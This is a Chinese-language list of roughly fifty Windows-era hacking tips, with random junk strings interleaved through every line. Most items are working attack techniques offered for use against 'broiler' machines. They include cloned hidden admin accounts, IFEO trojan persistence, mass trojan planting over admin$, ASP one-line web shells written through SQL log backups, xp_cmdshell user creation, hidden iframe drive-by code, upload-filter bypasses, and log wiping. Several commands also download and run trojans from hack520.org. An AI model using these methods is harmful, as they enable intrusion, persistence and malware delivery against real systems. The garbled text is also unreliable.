1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,, w5 M: d! _2 a. ^
cacls C:\windows\system32 /G hqw20:R& f/ B. d$ N1 e* y. G+ g5 r
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 K$ p+ u3 b! a2 l6 v% ^% R
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F k6 c. S! t8 m- E
4 [2 G: {/ i9 R2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。: r8 A7 r( h" j T C6 |6 w/ x
' c* b8 p: _3 L0 n; I
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。! S9 v. B: A0 u4 r6 X" r ^7 g
# h& y- J1 f4 z5 w4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号# d, x$ X# f$ W9 b
: {' v# V( C; ]) j
5、利用INF文件来修改注册表
- g' K# a. Q6 {" b% E6 n4 m5 W9 }[Version]
+ S/ f8 I# t8 x) |: lSignature="$CHICAGO$"8 Z$ m# H7 @, j1 f2 C, V
[Defaultinstall]
" d' F6 S- |/ Y0 j, A9 ~ _- w1 NaddREG=Ating
) F7 o; _3 O6 h o; w9 d: J* {[Ating]
@/ |1 A& ]- Y' M# {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
# V8 ~* @4 Y; s4 r# j以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
' g2 H8 F% }) U. ]# Hrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径, B/ c; t+ {1 ~9 X* G+ o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 C: a! I6 b; n) ^HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
( U }3 a4 E- A) mHKEY_CURRENT_CONFIG 简写为 HKCC
+ w) ~# B% Y# V% _2 t( a6 ^( K0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值+ x' w; F# Z: ~/ ~& P* i
"1"这里代表是写入或删除注册表键值中的具体数据
, O, @4 r/ ]# d3 D0 J6 c! g) g; j) k0 ?
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 ~) W; D. d! t5 _& K& s多了一步就是在防火墙里添加个端口,然后导出其键值5 G7 B/ x+ [" u* t3 m% j
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
- N0 Q/ S/ j0 ^# x) H, K1 K1 I. s3 n5 O7 p3 \0 L
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 z/ d. z& F- G- b3 p; w* M$ h在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
h" ^4 b& R- {0 C; r: L* K
$ ?. k. [9 L( O0 g- ? _8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
0 W- A0 U& u9 z. {( @
) Y2 ^: _( ]% e: H2 y7 |$ E: g9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
$ k: [% G7 n( ?7 Q可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& ]% f/ L( v9 c: q, Z0 E% K h A* W) V7 N# B
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; k& M: _ _3 o2 U$ t4 B' E. ~& S9 S% W* s/ R
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
~8 s+ e& }1 ~0 P4 U1 t7 z, ?! |9 I用法:xsniff –pass –hide –log pass.txt
, D3 O; C' v& L1 {. I& \$ P, Y8 {2 Z; |( o8 A
12、google搜索的艺术
) m; W8 M) a6 e+ r! @搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”* k9 Y$ B/ L2 ]* P# O& ?# A$ r
或“字符串的语法错误”可以找到很多sql注入漏洞。
( e# n% ?& a; @ C" S( G% K: s9 n# o7 }
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
3 A4 M+ p* M: G0 _
* k# v4 a8 y) Y9 L" ]: D14、cmd中输入 nc –vv –l –p 1987/ n3 q6 c6 P- |4 b- @
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃* m' |# w# ^7 @, }* ]
. L) f2 e9 R9 z" h' |" W! ^5 a15、制作T++木马,先写个ating.hta文件,内容为" ?$ \1 B+ p' z0 K; O) q. u o3 s( ?
<script language="VBScript">; A% Y# v9 \7 p2 ~: |
set wshshell=createobject ("wscript.shell" )
6 b; G+ p6 @; W' ea=wshshell.run("你马的名称",1)4 {6 z! q5 {' X# }
window.close; N4 l; S E4 ?1 v
</script>' B( r H* M7 r" D
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。+ ?4 b% d: _3 r/ Z+ x9 @$ E' \1 X
; \5 ?+ M& L9 T5 w& P3 P+ ?16、搜索栏里输入
! x; ~; H% j- q; d* a关键字%'and 1=1 and '%'='
6 r! x7 ?& h' R5 W$ D( V关键字%'and 1=2 and '%'='
# z3 x6 A& O6 E8 I9 L2 w) v比较不同处 可以作为注入的特征字符
% q9 U2 L# r) R, y: L3 D: K9 D3 \ v2 I, G& d
17、挂马代码<html>
! J1 w! |5 x6 W' p$ v<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
7 E+ D; Y$ e ]' w</html>
+ N. d1 }- O/ Z% q5 B ]+ ~4 `0 b; ]0 ]5 @/ L
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 S) ^' s3 ?& E3 O( v+ C3 unet localgroup administrators还是可以看出Guest是管理员来。' o* _+ q9 h; Q4 l, Q& o& K# f
) j9 ~+ h9 H4 A: p4 L) B3 b% r( p
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 v4 c5 f7 Z! R- z R* ]用法: 安装: instsrv.exe 服务名称 路径8 U8 d# L% {8 K0 P# F1 i! f
卸载: instsrv.exe 服务名称 REMOVE- S% {* T! d5 @( ]6 Q& e# I
# S5 L" r6 K& p3 N8 U9 s" S! e5 Y% z$ z1 t! K8 I
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
3 ^! M+ u3 }1 h7 G) Q不能注入时要第一时间想到%5c暴库。6 {- f: d0 F# D
' v4 |/ X5 w! I) `
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
7 |( {: t. H6 ]3 e: N0 I
. w2 U" L6 Z( j# T23、缺少xp_cmdshell时
- r+ _* {8 k$ P2 x; ^7 \尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 D" J/ o& S+ P0 ^* u |假如恢复不成功,可以尝试直接加用户(针对开3389的)
! p. u& \4 G" Q! {declare @o int* I! F8 _3 J7 n1 W4 R; E* i. k3 \
exec sp_oacreate 'wscript.shell',@o out, F9 |0 l- C8 Z& h- }) P' ^
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 i, b; N( L* e' F, ^9 ?3 V- j
& |; p w$ M) T6 h1 L24.批量种植木马.bat4 @' L- ^, ]% q: D
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ I' Q Q+ `1 u" C
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间" l4 r# D; e5 C: h8 ~
扫描地址.txt里每个主机名一行 用\\开头0 k/ c6 y& H4 X
4 G/ _+ ]* Y7 [! a! \8 n- j25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
5 @/ v9 F0 _/ s, ^! n, R) x& I6 }$ }. E3 L" v1 e; u+ v5 t
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.8 [$ z" ] q9 J
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
- z" E2 f6 c2 O6 @% {- E2 \% I.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% r5 U0 ]! D0 \5 ?9 c8 ?
$ ~; o4 E* }$ L27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 x7 f* Y! E, ^3 t/ v6 g2 ]
然后用#clear logg和#clear line vty *删除日志
8 n7 h# V& h8 U3 W: M8 y
5 ]" }4 [/ ?3 O k2 }/ o28、电脑坏了省去重新安装系统的方法
9 t2 w) `7 s" X, C纯dos下执行,
' R$ j$ c' G3 Z( [( hxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config" n& M& H5 c; j* `2 ^* q% F
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
( q1 s* f: l: S
. [! V& ]! Z0 _! W; D' J3 W# [29、解决TCP/IP筛选 在注册表里有三处,分别是:, _9 C8 ]: i }# X! Q) H9 z3 U% ]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 g+ ~% A. U: ]* Z) F2 A7 j Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% X. ]$ T6 N4 e1 r7 u4 {: ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; r2 j8 ]9 h9 D% _分别用. M0 f4 b F t6 `( p
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 G! F- ~7 f9 f+ v( Xregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 \, r, A* G* C6 G! Z; g
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# Q+ [6 q( p, k& c5 O命令来导出注册表项9 K7 I- ` f+ U0 [
然后把三个文件里的EnableSecurityFilters"=dword:00000001,/ i# @( p0 d4 {4 w# Q- N$ h
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: @: F; L& M9 u9 Xregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。9 o* m+ V! [- F
5 E0 I( w! M$ l: L4 ]
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
3 j6 v- A5 f) ]0 ~1 wSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 v, x( E- P X) K
9 O1 n* m3 H1 |31、全手工打造开3389工具- _0 }+ N( I* P% a& v [$ T) |
打开记事本,编辑内容如下:
+ ^4 x8 q/ K' i) Aecho [Components] > c:\sql$ U2 V, Z6 w, ?2 ]
echo TSEnable = on >> c:\sql1 j+ ?+ a$ \+ w7 j! [; h# x
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
# ]# R( B1 j3 f( f1 j1 c/ [编辑好后存为BAT文件,上传至肉鸡,执行
# y* M1 _( T2 G; w3 G- Y+ v s! Q4 K" C5 f% x# F7 q8 i E
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马" t. Z/ x8 k' G7 @
8 s) A, | q2 g4 ]+ r0 I33、让服务器重启
' W( V+ k( L/ C" i+ f% M& z# p, t/ I# M写个bat死循环:- \/ T6 F; n3 K8 Y
@echo off# ~0 o: q% P% D: n: ~6 j
:loop1- t' O: K1 j' C
cls
9 h. U, b, J6 ?8 Bstart cmd.exe5 L6 b8 a' l0 z
goto loop1
" u* u& B, r) c3 k/ W+ y保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启6 r, w& J% J0 c1 k) b, k$ V
2 S4 R9 ` W$ Z/ B3 D, D
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 R: j" z4 ~0 l- K# ~@echo off3 v. u% d: k1 Y; m
date /t >c:/3389.txt
. e& v" B/ q: N+ ltime /t >>c:/3389.txt6 F/ P, V w0 z
attrib +s +h c:/3389.bat
: ~. Y. [) S8 |4 `8 F) s9 N8 O9 Zattrib +s +h c:/3389.txt
3 r3 ]: \8 U, b; x! Jnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
- T) f8 e' l( \) X4 A并保存为3389.bat
7 G2 ^+ \ h( p" O7 P* i) s1 \打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
, S8 G u4 Q) ]2 W- o3 w0 R7 u- m. U
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
) d; q8 S4 y0 b- hstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
8 N7 m1 _' {! l/ F0 R1 G输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
, w! K+ X: o9 K: R. c1 ~5 T
5 f7 i/ i. l+ {" L4 e: p36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件1 z3 p: \: Z8 r$ s! Y9 f5 |$ g
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址7 q) C+ _; T, ~1 l5 n* b
echo 你的FTP账号 >>c:\1.bat //输入账号3 U* z; N2 | s5 G. g
echo 你的FTP密码 >>c:\1.bat //输入密码: I ]3 |7 ^' I3 [! X
echo bin >>c:\1.bat //登入/ Z/ O7 K8 r; F, g" M0 `
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" N5 I, ~ h3 X3 H. t3 i
echo bye >>c:\1.bat //退出3 C: w+ c3 @) ~; h
然后执行ftp -s:c:\1.bat即可" q. C; s) T# Y1 B6 _& z. ?& d) r$ h
+ a L3 a2 t/ S: w, V37、修改注册表开3389两法
+ h" q" M0 l; j9 K. n9 \8 q2 j' w' g(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& {$ _3 M4 @8 g8 ^4 @5 b* |echo Windows Registry Editor Version 5.00 >>3389.reg
* K0 y* R4 F0 s; n2 t8 ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( Q6 c5 u" f4 k0 n) P
echo "Enabled"="0" >>3389.reg
: o+ r2 Z# S% Q0 v5 K2 i. ^+ Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows% F$ C" f: G% y0 J
NT\CurrentVersion\Winlogon] >>3389.reg
4 S" }9 e4 L/ M6 L- Q9 \$ Y( H- z0 W" |echo "ShutdownWithoutLogon"="0" >>3389.reg
+ d7 h I: O$ v* gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
* x/ l* P- W( |8 w$ U: z- e>>3389.reg
9 t# D5 C- l" t' H+ ^7 `" u6 U& b8 Uecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& h9 w% z( I! c5 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
/ J0 S5 ?8 `. Y* G6 Z; s>>3389.reg2 E& V) u0 j8 h
echo "TSEnabled"=dword:00000001 >>3389.reg
. Z2 }* `- n9 X' }& xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
$ Z' k$ J2 B4 y9 xecho "Start"=dword:00000002 >>3389.reg
6 Y: T4 m9 V0 z& l% b( c$ zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]6 I% U7 W" H p/ b ?9 A
>>3389.reg
2 O( l% V6 e5 o) B& d r/ q6 [0 p# becho "Start"=dword:00000002 >>3389.reg
e0 x+ J8 C% h2 ^0 C6 Pecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ l+ F- \/ A8 i4 g, g6 f
echo "Hotkey"="1" >>3389.reg3 c( e2 z$ U, a% X0 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% e) A9 l8 i0 k$ K) ?Server\Wds\rdpwd\Tds\tcp] >>3389.reg' [* ^. v& p: `& @
echo "PortNumber"=dword:00000D3D >>3389.reg/ r, D' U7 D( e7 B) V) h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' b+ D* P, N& w9 K( Y" W
Server\WinStations\RDP-Tcp] >>3389.reg
: F) w, f l* r/ \echo "PortNumber"=dword:00000D3D >>3389.reg @# v% }0 x8 j+ [3 j+ U
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
* t4 l, l: ~# e/ h& }% F9 h(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)3 u( Q" T4 ?# ]) g) O
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
% N1 L9 C1 h% J E. \6 C0 e(2)winxp和win2003终端开启
% C; u& h. U; H* X用以下ECHO代码写一个REG文件:
: }, o7 h) L( \echo Windows Registry Editor Version 5.00>>3389.reg" N$ `% [/ Z! X2 o! }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- \1 C5 q' m) Y, M3 F
Server]>>3389.reg
3 k" v+ `" l7 i6 lecho "fDenyTSConnections"=dword:00000000>>3389.reg* n: V p/ d4 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- [; T/ Q9 s g% p
Server\Wds\rdpwd\Tds\tcp]>>3389.reg1 X, a$ {: e7 ~: r$ V4 p" R! u8 M( J
echo "PortNumber"=dword:00000d3d>>3389.reg3 u* F9 J3 x" M$ y) N; ?1 P1 e \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; o7 L0 G; q; S: I: `Server\WinStations\RDP-Tcp]>>3389.reg2 H8 a! \; r: l1 w- j5 g' n
echo "PortNumber"=dword:00000d3d>>3389.reg: H; [: h) c; p
然后regedit /s 3389.reg del 3389.reg
& x( T |' t" V% xXP下不论开终端还是改终端端口都不需重启$ H4 ? Q2 z! R- B* w& H8 b
' H# u) K; U( G' x38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃8 K+ [4 ] v) m+ o1 p5 u4 W
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'3 |& T$ p% w5 V1 v' O
, V. k3 D- f' C, ^
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
, e. b. |& F b2 V1 {(1)数据库文件名应复杂并要有特殊字符) Q, t, o6 `& ~2 Q+ E- {% w" y) t
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: B; j# \) k I, F将conn.asp文档中的! l6 k8 I2 h7 u% T
DBPath = Server.MapPath("数据库.mdb")
( i1 D9 u) h/ U7 L2 nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath) V+ M D4 M: q
h3 `# L( B9 V, y+ X5 Y" {# W( e修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 V- U+ i6 l+ [9 f(3)不放在WEB目录里
$ f. L; k4 T1 s& K- U5 d0 S, `$ q
) u' [6 G6 R1 q& p# D40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
5 I) d8 i, S! o. C; X0 {/ e可以写两个bat文件
, i* E' |3 C- ] Z6 R@echo off
6 ^. o+ K( x/ h7 _) o1 D& d9 v A@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe5 _- Z t6 u* O; K- r# N+ A
@del c:\winnt\system32\query.exe
, y1 p4 T+ o- F5 }, T: W@del %SYSTEMROOT%\system32\dllcache\query.exe0 H2 ]( r, l% a o* M ~
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的 d& a0 m2 r& _ L% Y- A" ?7 `
3 `# C- g/ e# _% U' b1 B; N# e4 K( V
@echo off
; y" U. Z$ N3 A6 ?7 x) n- D@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
, a9 R2 a& u3 Y# }: \# H! C@del c:\winnt\system32\tsadmin.exe
* o& h+ y+ t0 k. i9 A@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
2 E! n! l- _1 z1 m& d7 x5 L5 ]6 F' A) w7 g+ L
41、映射对方盘符4 ^, |; `3 l" M# }
telnet到他的机器上,5 b! ]' C) |/ W2 Q* J1 j4 Z
net share 查看有没有默认共享 如果没有,那么就接着运行
& F% I1 Y1 E/ _9 g9 R: inet share c$=c:/ D! v; q0 w/ A; I3 U
net share现在有c$
5 \0 j7 n% I2 N在自己的机器上运行$ O1 @. w: E& x: c9 |7 P0 ?) F
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
4 c2 }+ F& o1 n. W3 F" t& I; c2 |7 x2 R; Q. m; O- ^4 O( J1 v/ o9 Z4 j* K
42、一些很有用的老知识
; n% [" ?: i, k+ E) B& Itype c:\boot.ini ( 查看系统版本 )+ ^# S) B2 M# j. ?) ?+ l
net start (查看已经启动的服务)' @7 \) T5 g" i$ @5 Z% G
query user ( 查看当前终端连接 )# ]1 Z/ v9 g4 z) u. a# a
net user ( 查看当前用户 )
; Z0 x/ A! j0 W! C# inet user 用户 密码/add ( 建立账号 )1 v! M7 I0 s( r1 V1 c( P. |( T6 |
net localgroup administrators 用户 /add (提升某用户为管理员). _) x; o) _: u. M9 s" S
ipconfig -all ( 查看IP什么的 )# z) ?4 Q5 J1 y; r* c7 U L
netstat -an ( 查看当前网络状态 ); o' P( l6 ?" a* Y6 a5 @
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)) A! {8 R7 m3 i) D8 H5 y
克隆时Administrator对应1F4+ T' M; [/ D% t
guest对应1F5
+ h3 `, ]# _0 |! w9 @tsinternetuser对应3E8
; k: z* ~, s) {$ ` {. q
/ [+ U7 m+ }; O3 v43、如果对方没开3389,但是装了Remote Administrator Service' v+ u; U5 g8 A( ~+ H
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
( [% m: P7 x" q0 b. e" f8 P3 V. U/ x" j解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
$ X! [* Q) i9 F, Q' t) C( U先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"/ q+ i$ a D" i' a
: c4 }' }; _2 Z7 q7 t44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)4 g" z7 ]. n# U0 b- L1 d) H" H
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口): ?5 ~7 y; P( D6 M8 m( R
/ O8 a) P5 j/ U* v& {* E9 X4 r& z2 X45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)$ k2 ?! e. N' M& `' ^
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open6 b1 |$ ~' P# \8 N
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ L' f/ k# }/ ZCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- g7 B- {- Y& t3 v; n4 q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
; x- V0 ?: O& S(这是完整的一句话,其中没有换行符)- t5 H9 Z' [& W/ f2 l+ i
然后下载:; {' E( z$ K( ?9 S# |
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 K. p, {* V; k i! e
0 U4 L5 m4 P5 d# ~: Y0 p46、一句话木马成功依赖于两个条件:' ?5 J% Q- a( G( W
1、服务端没有禁止adodb.Stream或FSO组件, F. V4 N# g* k) f, S9 t
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
/ P, T: k( l2 \
1 c% G& B. t6 A47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. g6 k0 S6 F& \3 ?1 y;alter database utsz set RECOVERY FULL--
D& A+ r' h) f% P/ O3 l6 G;create table cmd (a image)--# ~" K7 d- U: E/ K8 [. q; B) t' W
;backup log utsz to disk = 'D:\cmd' with init--
* [' O- a& w+ e* H/ s8 ^;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* F! ^; O9 w: ?;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& b, k3 X0 g. r
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。* s' E# p8 S, {: ]
6 [1 M( Z$ v- }% t: U1 ?" x( q
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
7 d" ]3 E# P% Y) b7 P6 |/ Z$ }. e
& K$ I) Z0 x5 f) q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( c3 W; G: S3 ]5 F0 N所有会话用 'all'。
1 A# I5 Z6 L* K0 g- s$ G-s sessionid 列出会话的信息。
2 m8 } g4 T8 m& l-k sessionid 终止会话。# e1 T- d8 U% {6 T3 j
-m sessionid 发送消息到会话。: h2 l/ p( B4 i0 A
4 ?8 O1 M, |& M5 k) e1 Aconfig 配置 telnet 服务器参数。 I( l) j, ^- f* y
2 l6 g9 I) h8 r' G) b5 Bcommon_options 为:4 Y- O* q6 F, W4 D- r
-u user 指定要使用其凭据的用户, I# y( b; [( ]' Q; M' o3 r2 l& M
-p password 用户密码- w6 u) N$ W' a, p
h* h9 }) _3 F8 I; W
config_options 为:
+ J7 o' H9 W, m) s; jdom = domain 设定用户的默认域
7 i- c& l& q, m- O' Y+ ~0 Rctrlakeymap = yes|no 设定 ALT 键的映射
7 S- M g! w" B3 \. g% G" ~6 Dtimeout = hh:mm:ss 设定空闲会话超时值4 N# A. ^6 r) }% I2 Y+ `8 U
timeoutactive = yes|no 启用空闲会话。+ N5 a$ I2 x! b O1 N4 C7 R' c
maxfail = attempts 设定断开前失败的登录企图数。" S4 _6 u) l" u/ b0 J8 r
maxconn = connections 设定最大连接数。
, K W2 p" f0 n+ F2 Z* aport = number 设定 telnet 端口。) r7 r7 S% J) Z3 _8 ^+ D
sec = [+/-]NTLM [+/-]passwd
) d! q7 Z0 Q& o2 F8 ]设定身份验证机构7 `' P4 h7 t. p: f: ?7 Y; p
fname = file 指定审计文件名。
/ S" n$ M. S2 P) afsize = size 指定审计文件的最大尺寸(MB)。
9 K. I+ f9 {# M8 D# S6 z0 w8 ~mode = console|stream 指定操作模式。
% v/ E8 W" K' W; |+ N1 }# b( ]% cauditlocation = eventlog|file|both
$ Y" K- ]6 z, j指定记录地点
) C# {3 h2 v+ U: K! faudit = [+/-]user [+/-]fail [+/-]admin- j( @% E8 }5 B% P6 `
; A O ? u* F% B ` { g49、例如:在IE上访问:
7 t2 |3 E# M! k: Fwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/$ R$ l& Q$ M) _! t# F" W0 b0 @
hack.txt里面的代码是:% e; b! b1 K2 ]8 U5 P5 E6 k( k
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
. y+ q% X ^! Q4 \2 |" f' ~. n8 f把这个hack.txt发到你空间就可以了!
" x1 @9 Y# ~7 ?! h$ `5 J* n$ v这个可以利用来做网马哦!
, J) Y6 y* R( O8 M2 w/ P5 I' U' e% Z" k1 b: B
50、autorun的病毒可以通过手动限制!
7 y, ~7 z: r) A: b0 z: H0 {1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' D% _, a# b$ B) i; X1 t2,打开盘符用右键打开!切忌双击盘符~. N! d7 w# T. u! t. K1 c5 x
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
" P* q. ^1 F! i% ?2 Z: Y. |, ^( [8 p5 `4 J$ z, K+ w2 ]# J+ M
51、log备份时的一句话木马:
2 y Q" h; U5 w) V* wa).<%%25Execute(request("go"))%%25>
$ ]" k9 I6 [$ K7 q2 W; eb).<%Execute(request("go"))%>
- u) }& i6 E! V/ Zc).%><%execute request("go")%><%
7 A- M5 T3 d; Gd).<script language=VBScript runat=server>execute request("sb")</Script>1 K5 D3 l1 {5 f) ]4 S& v6 o8 U
e).<%25Execute(request("l"))%25>/ |7 V% j( [0 f( Q7 n- h. k* j
f).<%if request("cmd")<>"" then execute request("pass")%>, M4 i: Q+ U; _3 Q1 ^
. E5 |8 f0 U5 K* l1 ~/ F) J
52、at "12:17" /interactive cmd
